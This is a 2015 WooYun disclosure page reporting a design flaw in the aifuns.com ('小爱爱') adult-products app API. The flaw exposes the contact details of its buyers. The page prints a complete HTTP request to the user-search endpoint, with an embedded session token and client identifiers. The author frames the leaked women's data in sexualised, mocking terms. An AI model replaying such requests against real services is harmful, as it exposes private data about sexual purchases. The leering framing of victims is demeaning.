当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141274

漏洞标题:小爱爱设计缺陷导致敏感信息泄漏(那些年买了跳蛋的妹子们的联系方式)

相关厂商:aifuns.com

漏洞作者: 北京方便面

提交时间:2015-09-17 15:29

修复时间:2015-11-01 17:18

公开时间:2015-11-01 17:18

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

小爱爱设计缺陷导致敏感信息泄漏(那些年买了跳蛋的妹子们的联系方式)
某妹子:“哥哥棒棒哒,弄的人家不要不要的...”

详细说明:

IMG_0693.PNG


POST /api/v2/user/searchuser HTTP/1.1
Host: api.aifuns.com:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: %E5%B0%8F%E7%88%B1%E7%88%B1/31 CFNetwork/711.3.18 Darwin/14.0.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 660
data=%7B%0A%20%20%22appver%22%20:%20%2231%22,%0A%20%20%22channel%22%20:%20%22appstore%22,%0A%20%20%22lang%22%20:%20%22zh-Hans%22,%0A%20%20%22aiainum%22%20:%20%221081376%22,%0A%20%20%22platform%22%20:%20%221%22,%0A%20%20%22ver%22%20:%20%221.0%22,%0A%20%20%22tk%22%20:%20%22bae2f8f3242097156e96b94ef187209a%22,%0A%20%20%22clientid%22%20:%20%2218714F45-788F-4458-81EB-81222A71A061%22,%0A%20%20%22token%22%20:%20%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOnsiY2xpZW50SWQiOiIxODcxNEY0NS03ODhGLTQ0NTgtODFFQi04MTIyMkE3MUEwNjEiLCJ1c2VySWQiOiI5MjU0MiJ9LCJpdWEiOjE0NDQ4ODczNTR9.Lb6TxRIzsR93jBhRF3wD6Hv_HNbV0rUHwfCX9pIgzZQ%22,%0A%20%20%22appid%22%20:%20%221%22%0A%7D


屏幕快照 2015-09-15 下午1.37.09.png


屏幕快照 2015-09-15 下午12.50.38.png


16ABE700-C4F0-49BA-861C-7C3B77EC1A24.png


IMG_0684.JPG


IMG_0685.JPG


IMG_0688.PNG


IMG_0689.JPG


IMG_0690.JPG


IMG_0691.JPG


IMG_0692.PNG


福利不少啊:

IMG_0686.JPG


IMG_0687.JPG


E2B9F15C995607826E57FF3C6DA43796.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-09-17 17:16

厂商回复:

感谢发现者,这个漏洞和您提的另外一个漏洞基本是重复的。不过还是谢谢你。

最新状态:

暂无